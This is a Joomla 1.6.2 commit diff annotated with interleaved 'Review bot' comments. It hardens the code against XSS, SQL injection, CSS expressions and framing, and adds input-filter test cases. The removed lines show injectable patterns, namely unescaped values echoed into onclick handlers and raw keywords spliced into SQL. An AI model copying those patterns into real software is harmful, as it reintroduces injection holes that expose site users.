
Preparing for 1.6.2

git-svn-id: http://joomlacode.org/svn/joomla/development/trunk@21148 6f6e1ebd-4c2b-0410-823f-f34bde69bce9
This commit is contained in:
Ian MacLennan 2011-04-14 17:30:08 +00:00
parent 5ce00dde60
commit c4c870b5cb
31 changed files with 343 additions and 94 deletions


@ -34,18 +34,23 @@ class BannersModelBanner extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if (!empty($record->id)) {
if ($record->state != -2) {
return ;
}
$user = JFactory::getUser();
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state changed.
*
* @param object A record object.
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
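Review bot: The guard `return ;` on the line after `if ($record->state != -2)` returns null rather than the boolean the docblock promises, and the method also falls off the end with null when `$record->id` is empty; both are only safe because null is falsy at the caller. Make the outcome explicit with `return false;` in both places so the `@return boolean` contract holds and a missing-return warning from static analysis is avoided. The same pattern appears in the canDelete hunks for BannersModelClient, CategoriesModelCategory, ContactModelContact, ContentModelArticle, MenusModelItem, NewsfeedsModelNewsfeed, RedirectModelLink and WeblinksModelWeblink in this commit. The docblock of this method begins outside the hunk.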


@ -28,13 +28,18 @@ class BannersModelClient extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
}
else {
return $user->authorise('core.delete', 'com_banners');
if (!empty($record->id)) {
if ($record->state != -2) {
return ;
}
$user = JFactory::getUser();
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
}
else {
return $user->authorise('core.delete', 'com_banners');
}
}
}


@ -88,15 +88,14 @@ class BannersViewBanners extends JView
JToolBarHelper::custom('banners.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
}
if ($this->state->get('filter.state') == -2 && $canDo->get('core.delete')) {
if ($canDo->get('core.edit.state')) {
JToolBarHelper::trash('banners.trash','JTOOLBAR_TRASH');
}
if ( $canDo->get('core.delete')) {
JToolBarHelper::deleteList('', 'banners.delete','JTOOLBAR_EMPTY_TRASH');
JToolBarHelper::divider();
}
else if ($canDo->get('core.edit.state')) {
JToolBarHelper::trash('banners.trash','JTOOLBAR_TRASH');
JToolBarHelper::divider();
}
if ($canDo->get('core.admin')) {
JToolBarHelper::preferences('com_banners');
JToolBarHelper::divider();
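Review bot: Reading the lines from `if ($canDo->get('core.edit.state'))` through the `deleteList` call as the new side, the JTOOLBAR_EMPTY_TRASH button is now rendered whenever the user holds core.delete, no longer only when `filter.state` is -2; the model's new state check will refuse non-trashed items, but the list view shows an "empty trash" action whose label does not match what is on screen. Keep `$this->state->get('filter.state') == -2 &&` in front of the `deleteList` condition (as the MenusViewItems hunk still does with `filter.published`), or relabel the action when the filter is not trash. The stray space in `if ( $canDo->get('core.delete'))` also departs from the file's own style. The BannersViewClients hunk has the same change.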


@ -69,11 +69,11 @@ class BannersViewClients extends JView
JToolBarHelper::archiveList('clients.archive','JTOOLBAR_ARCHIVE');
JToolBarHelper::custom('clients.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
}
if ($this->state->get('filter.state') == -2 && $canDo->get('core.delete')) {
JToolBarHelper::deleteList('', 'clients.delete','JTOOLBAR_EMPTY_TRASH');
JToolBarHelper::divider();
} else if ($canDo->get('core.edit.state')) {
if ($canDo->get('core.edit.state')) {
JToolBarHelper::trash('clients.trash','JTOOLBAR_TRASH');
}
if ( $canDo->get('core.delete')) {
JToolBarHelper::deleteList('', 'clients.delete','JTOOLBAR_EMPTY_TRASH');
JToolBarHelper::divider();
}


@ -34,10 +34,16 @@ class CategoriesModelCategory extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if (!empty($record->id)) {
if ($record->published != -2) {
return ;
}
$user = JFactory::getUser();
return $user->authorise('core.delete', $record->extension.'.category.'.(int) $record->id);
}
return $user->authorise('core.delete', $record->extension.'.category.'.(int) $record->id);
}
}
/**
* Method to test whether a record can be deleted.


@ -30,19 +30,18 @@ class ContactModelContact extends JModelAdmin
* @since 1.6
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if ($record->catid) {
{
if (!empty($record->id)) {
if ($record->published != -2) {
return ;
}
$user = JFactory::getUser();
return $user->authorise('core.delete', 'com_contact.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state edited.
*
* @param object $record A record object.
*
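Review bot: Taking the lines from `if (!empty($record->id))` as the new side, the call `return $user->authorise('core.delete', 'com_contact.category.'.(int) $record->catid);` no longer sits behind a catid check, so a contact with an empty catid is authorised against the asset `com_contact.category.0` instead of falling back to `parent::canDelete($record)` the way the Banners, Newsfeeds and Weblinks hunks in this commit still do. If dropping the parent fallback is intentional, say so in a comment such as `// Contacts are always categorised; no component-level fallback.`; otherwise restore the `if (!empty($record->catid))` guard with the `else { return parent::canDelete($record); }` branch. The method's docblock starts outside the hunk.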


@ -87,7 +87,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<td>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $this->escape($item->name); ?></a>
</td>
<td align="center">
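Review bot: `$this->escape($function)` HTML-escapes the value, but on this line it is emitted as a JavaScript identifier inside the `onclick` attribute (`window.parent.<?php echo $this->escape($function);?>(`), a context where HTML escaping is not the matching control: characters that are harmless in an attribute value are still meaningful to the script parser. Unless `$function` is already constrained upstream (for example fetched in the view through `JRequest::getCmd`, which limits the character set), validate it against an identifier pattern before it reaches the template, e.g. `if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $function)) { $function = '<default-callback>'; }` with the view's real default in place of the placeholder, and keep `$this->escape` as defence in depth. The same construct is changed in the content, newsfeeds, users and site-side modal templates of this commit.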


@ -39,13 +39,17 @@ class ContentModelArticle extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
return $user->authorise('core.delete', 'com_content.article.'.(int) $record->id);
if (!empty($record->id)) {
if ($record->state != -2) {
return ;
}
$user = JFactory::getUser();
return $user->authorise('core.delete', 'com_content.article.'.(int) $record->id);
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state edited.
*
* @param object $record A record object.
*


@ -88,7 +88,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<td>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
<?php echo $this->escape($item->title); ?></a>
</td>
<td class="center">


@ -55,13 +55,18 @@ class MenusModelItem extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if (!empty($record->id)) {
if ($record->published != -2) {
return ;
}
$user = JFactory::getUser();
return $user->authorise('core.delete', 'com_menus.item.'.(int) $record->id);
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state edited.
*
* @param object A record object.
*


@ -185,13 +185,13 @@ class MenusViewItems extends JView
JToolBarHelper::divider();
JToolBarHelper::custom('items.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
}
if ($canDo->get('core.edit.state')) {
JToolBarHelper::trash('items.trash','JTOOLBAR_TRASH');
}
if ($this->state->get('filter.published') == -2 && $canDo->get('core.delete')) {
JToolBarHelper::deleteList('', 'items.delete','JTOOLBAR_EMPTY_TRASH');
}
else if ($canDo->get('core.edit.state')) {
JToolBarHelper::trash('items.trash','JTOOLBAR_TRASH');
}
if ($canDo->get('core.edit.state')) {
JToolBarHelper::makeDefault('items.setDefault', 'COM_MENUS_TOOLBAR_SET_HOME');


@ -85,8 +85,11 @@ class ModulesModelModule extends JModelAdmin
if ($table->load($pk)) {
// Access checks.
if (!$user->authorise('core.delete', 'com_modules')) {
throw new Exception(JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
if (!$user->authorise('core.delete', 'com_modules') ||
$table->published != -2) {
JError::raiseWarning(403, JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
// throw new Exception(JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
return;
}
if (!$table->delete($pk)) {
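Review bot: The commented-out `// throw new Exception(JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));` is dead code now that the `JError::raiseWarning(403, ...)` path replaces it; delete the line rather than keeping both. The bare `return;` after the warning gives the caller no value to distinguish refusal from success, and if this block sits inside a per-`$pk` loop (the enclosing method starts and ends outside the hunk) it abandons the remaining ids instead of skipping the refused one, so `continue` or `return false` is probably what is wanted. Putting `$table->published != -2` on its own line with a comment such as `// Only trashed modules may be deleted.` would also make the new state requirement visible to the next reader.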


@ -34,18 +34,23 @@ class NewsfeedsModelNewsfeed extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_newsfeed.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
if (!empty($record->id)) {
if ($record->published != -2) {
return ;
}
$user = JFactory::getUser();
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_newsfeed.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state changed.
*
* @param object A record object.
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
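Review bot: The asset name built on the `return $user->authorise('core.delete', 'com_newsfeed.category.'.(int) $record->catid);` line uses the singular `com_newsfeed`, while the component is com_newsfeeds; if category assets are registered under `com_newsfeeds.category.N` this string never matches an asset and the check fails closed for every categorised feed, which the new code keeps as-is. Confirm the asset naming against the component's table and, if it is wrong, change the prefix to `'com_newsfeeds.category.'`. The implicit-null `return ;` issue is noted on the BannersModelBanner hunk of this commit.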


@ -85,7 +85,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<td>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $this->escape($item->name); ?></a>
</td>
<td class="center">


@ -24,6 +24,45 @@ class RedirectModelLink extends JModelAdmin
* @since 1.6
*/
protected $text_prefix = 'COM_REDIRECT';
/**
* Method to test whether a record can be deleted.
*
* @param object $record A record object.
*
* @return boolean True if allowed to delete the record. Defaults to the permission set in the component.
* @since 1.6
*/
protected function canDelete($record)
{
if (!empty($record->id)) {
if ($record->state != -2) {
return ;
}
$user = JFactory::getUser();
return $user->authorise('core.delete', 'com_redirect');
}
}
/**
* Method to test whether a record can have its state edited.
*
* @param object $record A record object.
*
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
* @since 1.6
*/
protected function canEditState($record)
{
$user = JFactory::getUser();
// Check the component since there are no categories or other assets.
if (!empty($record->id)) {
return parent::canEditState($record);
}
}
/**
* Returns a reference to the a Table object, always creating it.
*
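Review bot: In canEditState the local `$user = JFactory::getUser();` is never used — the method only delegates to `parent::canEditState($record)` — so remove it, and the comment `// Check the component since there are no categories or other assets.` describes what the parent implementation is expected to do rather than anything visible here; rephrase it as `// No category assets for redirects: defer to the component-level check in the parent.` The new canDelete shares the `return ;`/implicit-null issue raised on the BannersModelBanner hunk, and its `@return boolean` docblock is contradicted by both exit paths that yield null.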


@ -23,7 +23,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" size="40" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
<button type="button" onclick="if (window.parent) window.parent.<?php echo $function;?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
<button type="button" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
</div>
<div class="right">
<ol>
@ -64,7 +64,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
foreach ($this->items as $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<td>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $item->name; ?></a>
</td>
<td align="center">
@ -79,7 +79,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
</table>
<div>
<input type="hidden" name="task" value="" />
<input type="hidden" name="field" value="<?php echo $field; ?>" />
<input type="hidden" name="field" value="<?php echo $this->escape($field); ?>" />
<input type="hidden" name="boxchecked" value="0" />
<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
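Review bot: The link text `<?php echo $item->name; ?>` on the line after the `onclick` anchor is still emitted without `$this->escape`, although the same value is escaped (and addslashes-wrapped) for the handler on the line above; the other modal templates in this commit escape it, so this one looks like an oversight rather than a deliberate difference. Change it to `<?php echo $this->escape($item->name); ?>`. The same unescaped line is present in the site-side users modal hunk of this commit. The `$this->escape($function)` change itself is discussed on the contact modal hunk; `$this->escape($field)` on the hidden input is in plain attribute context, where HTML escaping is the right control.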


@ -34,18 +34,23 @@ class WeblinksModelWeblink extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if ($record->catid) {
return $user->authorise('core.delete', 'com_weblinks.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
if (!empty($record->id)) {
if ($record->state != -2) {
return ;
}
$user = JFactory::getUser();
if ($record->catid) {
return $user->authorise('core.delete', 'com_weblinks.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state changed.
*
* @param object A record object.
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.


@ -20,7 +20,7 @@ defined('_JEXEC') or die;
/*
* Installation check, and check on removal of the install directory.
*/
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) /*|| file_exists(JPATH_INSTALLATION.'/index.php')*/) {
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) || file_exists(JPATH_INSTALLATION.'/index.php')) {
header('Location: ../installation/index.php');
exit();
}
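Review bot: Re-enabling the `file_exists(JPATH_INSTALLATION.'/index.php')` condition leaves the whole check on one line of roughly 170 characters with no explanation of why the installer's presence is a reason to refuse to serve the site; split the three conditions onto separate lines and precede them with `// Refuse to run while the installation directory is still present.` so the intent survives the next edit. The comparison `filesize(...) < 10` is an unexplained magic number as well — a short comment naming it as "an effectively empty configuration.php" would help. The administrator index.php hunk in this commit makes the same change.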


@ -90,7 +90,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<th>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $this->escape($item->name); ?></a>
</th>
<td class="center">


@ -86,7 +86,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<th>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
<?php echo $this->escape($item->title); ?></a>
</th>
<td class="center">


@ -87,7 +87,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<th>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $this->escape($item->name); ?></a>
</th>
<td class="center">


@ -25,7 +25,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
<button type="button" onclick="if (window.parent) window.parent.<?php echo $function;?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
<button type="button" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
</div>
<div class="filter-select">
<label for="filter_group_id">
@ -60,7 +60,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
foreach ($this->items as $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<td>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $item->name; ?></a>
</td>
<td class="center">


@ -85,6 +85,7 @@ class BannersModelBanners extends JModelList
if ($cid) {
$query->where('a.cid = ' . (int) $cid);
$query->join('LEFT', '#__banner_clients AS cl ON cl.id = a.cid');
$query->join('LEFT', '#__categories as cat ON a.catid = cat.id');
$query->select('cl.track_impressions as client_track_impressions');
$query->where('cl.state = 1');
}
@ -138,7 +139,7 @@ class BannersModelBanners extends JModelList
foreach ($keywords as $keyword)
{
$keyword=trim($keyword);
$condition1 = "a.own_prefix=1 AND a.metakey_prefix=SUBSTRING('".$keyword."',1,LENGTH( a.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=1 AND cl.metakey_prefix=SUBSTRING('".$keyword."',1,LENGTH(cl.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=0 AND ".($prefix==substr($keyword,0,strlen($prefix))?'1':'0');
$condition1 = "a.own_prefix=1 AND a.metakey_prefix=SUBSTRING(".$db->quote($keyword).",1,LENGTH( a.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=1 AND cl.metakey_prefix=SUBSTRING(".$db->quote($keyword).",1,LENGTH(cl.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=0 AND ".($prefix==substr($keyword,0,strlen($prefix))?'1':'0');
$condition2="a.metakey REGEXP '[[:<:]]".$db->getEscaped($keyword) . "[[:>:]]'";
@ -270,4 +271,4 @@ class BannersModelBanners extends JModelList
}
}
}
}
}
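Review bot: `$db->quote($keyword)` fixes the raw interpolation in `$condition1`, but `$condition2` on the next line still builds a `REGEXP '[[:<:]]...[[:>:]]'` from `$db->getEscaped($keyword)`: that only escapes SQL quoting, so regex metacharacters in a keyword (`[`, `(`, `*`) reach MySQL's regex engine and can turn the whole query into an error instead of an empty match. Either escape regex metacharacters before `getEscaped` (a `preg_quote`-style pass, since the database layer has no helper for it) or fall back to a `LIKE` comparison for keywords that contain them. The rest of the keyword loop is outside the hunk, as is any use of the `cat` alias introduced by the added `#__categories` join, so I cannot tell whether that join is consumed.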


@ -410,7 +410,7 @@ final class JSite extends JApplication
$menu = $this->getMenu();
$item = $menu->getActive();
if (!$item) {
$item = $menu->getItem(JRequest::getVar('Itemid'));
$item = $menu->getItem(JRequest::getInt('Itemid'));
}
$id = 0;


@ -21,7 +21,7 @@ defined('_JEXEC') or die;
// Installation check, and check on removal of the install directory.
//
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) /*|| file_exists(JPATH_INSTALLATION.'/index.php')*/) {
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) || file_exists(JPATH_INSTALLATION.'/index.php')) {
if (file_exists(JPATH_INSTALLATION.'/index.php')) {
header('Location: '.substr($_SERVER['REQUEST_URI'],0,strpos($_SERVER['REQUEST_URI'],'index.php')).'installation/index.php');
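Review bot: `strpos($_SERVER['REQUEST_URI'],'index.php')` returns false when the administrator area is reached through a URL without `index.php` in it, and `substr(..., 0, false)` then yields an empty prefix, so the redirect becomes the relative `installation/index.php` resolved underneath `administrator/` rather than the site root. Compute the prefix once and fall back when it is absent: `$pos = strpos($_SERVER['REQUEST_URI'], 'index.php');` followed by `$prefix = ($pos === false) ? '../' : substr($_SERVER['REQUEST_URI'], 0, $pos);` and `header('Location: '.$prefix.'installation/index.php');`. The enclosing block continues past the hunk, so I cannot see the `exit` that should follow the header.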


@ -27,6 +27,9 @@ $ -> Language fix or change
- -> Removed
! -> Note
-------------------- 1.6.2 Stable Release [14-Apr-2011] ------------------
14-Apr-2011
# [#25617] performance of assets table query with > 40 articles on website in registered mode


@ -279,6 +279,15 @@ class JFilterInput extends JObject
$postTag = substr($postTag, $tagOpen_start);
$fromTagOpen = substr($postTag, 1);
$tagOpen_end = strpos($fromTagOpen, '>');
// Check for mal-formed tag where we have a second '<' before the first '>'
$nextOpenTag = (strlen($postTag) > $tagOpen_start) ? strpos($postTag, '<', $tagOpen_start + 1) : false;
if (($nextOpenTag !== false) && ($nextOpenTag < $tagOpen_end)) {
// At this point we have a mal-formed tag -- remove the offending open
$postTag = substr($postTag, 0, $tagOpen_start) . substr($postTag, $tagOpen_start + 1);
$tagOpen_start = strpos($postTag, '<');
continue;
}
// Let's catch any non-terminated tags and skip over them
if ($tagOpen_end === false) {
@ -566,13 +575,19 @@ class JFilterInput extends JObject
$escapedChars = array ('&lt;', '&quot;', '&gt;');
// Process each portion based on presence of =" and "<space>, "/>, or ">
// See if there are any more attributes to process
while (preg_match('#\s*=\s*\"#', $remainder, $matches, PREG_OFFSET_CAPTURE))
while (preg_match('#\s*=\s*(\"|\')#', $remainder, $matches, PREG_OFFSET_CAPTURE))
{
// get the portion before the attribute value
$quotePosition = $matches[0][1];
$nextBefore = $quotePosition + strlen($matches[0][0]);
// Figure out if we have a single or double quote and look for the matching closing quote
// Closing quote should be "/>, ">, "<space>, or " at the end of the string
$quote = substr($matches[0][0], -1);
$pregMatch = ($quote == '"') ? '#(\"\s*/\s*>|\"\s*>|\"\s+|\"$)#' : "#(\'\s*/\s*>|\'\s*>|\'\s+|\'$)#";
// get the portion after attribute value
if (preg_match('#(\"\s*/\s*>|\"\s*>|\"\s+|\"$)#', substr($remainder, $nextBefore), $matches, PREG_OFFSET_CAPTURE)) {
if (preg_match($pregMatch, substr($remainder, $nextBefore), $matches, PREG_OFFSET_CAPTURE)) {
// We have a closing quote
$nextAfter = $nextBefore + $matches[0][1];
} else {
@ -583,11 +598,40 @@ class JFilterInput extends JObject
$attributeValue = substr($remainder, $nextBefore, $nextAfter - $nextBefore);
// Escape bad chars
$attributeValue = str_replace($badChars, $escapedChars, $attributeValue);
$alreadyFiltered .= substr($remainder, 0, $nextBefore) . $attributeValue . '"';
$attributeValue = $this->_stripCSSExpressions($attributeValue);
$alreadyFiltered .= substr($remainder, 0, $nextBefore) . $attributeValue . $quote;
$remainder = substr($remainder, $nextAfter + 1);
}
// At this point, we just have to return the $alreadyFiltered and the $remainder
return $alreadyFiltered . $remainder;
}
}
/**
* Remove CSS Expressions in the form of <property>:expression(...)
*
* @param string $source The source string.
* @return string Filtered string
* @since 1.6
*/
protected function _stripCSSExpressions($source)
{
// Strip any comments out (in the form of /*...*/)
$test = preg_replace('#\/\*.*\*\/#U', '', $source);
// Test for :expression
if (!stripos($test, ':expression')) {
// Not found, so we are done
$return = $source;
}
else {
// At this point, we have stripped out the comments and have found :expression
// Test stripped string for :expression followed by a '('
if (preg_match_all('#:expression\s*\(#', $test, $matches)) {
// If found, remove :expression
$test = str_ireplace(':expression', '', $test);
$return = $test;
}
}
return $return;
}
}
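Review bot: In `_stripCSSExpressions`, `if (!stripos($test, ':expression'))` treats a match at offset 0 as "not found" because `stripos` returns the integer 0 there, so an attribute value that begins with `:expression` bypasses the stripping branch; write `if (stripos($test, ':expression') === false)`. In the else branch `$return` is only assigned when `preg_match_all` succeeds, so a value that contains `:expression` without a following `(` returns an undefined variable (null) and the attribute is emptied with a notice; initialise `$return = $source;` before the `if`, and drop the unused `$matches` argument from `preg_match_all`. The accompanying test cases (tracker25558b–d) all put `xss:` before the expression, so neither path is exercised — a case with the expression at the start of the value and one with `:expression` not followed by `(` would pin the fix.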


@ -660,10 +660,13 @@ abstract class JHtmlBehavior
// Include mootools framework
self::framework();
$js = "window.addEvent('domready', function () {if (top != self) {top.location.replace(".$location.");}});";
$js = "window.addEvent('domready', function () {if (top == self) {document.documentElement.style.display = 'block'; } else {top.location = self.location; }});";
$document = JFactory::getDocument();
$document->addStyleDeclaration('html { display:none }');
$document->addScriptDeclaration($js);
JResponse::setHeader('X-Frames-Options', 'SAME-ORIGIN');
JResponse::setHeader('X-Content-Security-Policy', 'frame-ancestors \'self\'');
$loaded = true;
}
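Review bot: `JResponse::setHeader('X-Frames-Options', 'SAME-ORIGIN')` uses a header name and value that browsers do not recognise — the header is `X-Frame-Options` and the value is `SAMEORIGIN`, with no hyphen in either token — so as written the server-side framing defence is silently ineffective and only the script on the line above takes effect. Change it to `JResponse::setHeader('X-Frame-Options', 'SAMEORIGIN');`. `X-Content-Security-Policy` was the prefixed experimental form at the time and is harmless to keep alongside. If `$location` was a parameter of this method (the signature is outside the hunk), the new `$js` line no longer reads it and it is now an unused parameter worth documenting or removing.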


@ -24,13 +24,13 @@ class JVersion
/** @public string Development Status */
public $DEV_STATUS = 'Stable';
/** @public int Sub Release Level */
public $DEV_LEVEL = '1';
public $DEV_LEVEL = '2';
/** @public int build Number */
public $BUILD = '';
/** @public string Codename */
public $CODENAME = 'Onward';
/** @public string Date */
public $RELDATE = '07-Mar-2011';
public $RELDATE = '14-Apr-2011';
/** @public string Time */
public $RELTIME = '23:00';
/** @public string Timezone */


@ -3,6 +3,8 @@
* PHPMailer language file.
* English Version
*/
// no direct access
defined('_JEXEC') or die;
$PHPMAILER_LANG = array();


@ -311,6 +311,30 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'123.567',
'From generic cases'
),
'string_single_quote' => array(
'string',
"this is a 'test' of ?",
"this is a 'test' of ?",
'From generic cases'
),
'string_double_quote' => array(
'string',
'this is a "test" of "double" quotes',
'this is a "test" of "double" quotes',
'From generic cases'
),
'string_odd_double_quote' => array(
'string',
'this is a "test of "odd number" of quotes',
'this is a "test of "odd number" of quotes',
'From generic cases'
),
'string_odd_mixed_quote' => array(
'string',
'this is a "test\' of "odd number" of quotes',
'this is a "test\' of "odd number" of quotes',
'From generic cases'
),
'unknown_01' => array(
'',
'123.567',
@ -356,7 +380,7 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'Malformed Nested tags' => array(
'',
'<em><strongFred</strong></em>',
'<em><strongFred</strong></em>',
'<em>strongFred</strong></em>',
'From generic cases'
),
'Unquoted Attribute Without Space' => array(
@ -413,6 +437,12 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'<img class="one two" />',
'Test for recursion with single tags - From generic cases'
),
'missing_quote' => array(
'string',
'<img height="123 />',
'img height="123 /&gt;"',
'From generic cases'
),
);
}
@ -662,7 +692,37 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'<img class="one two" />',
'<img />',
'From specific cases'
)
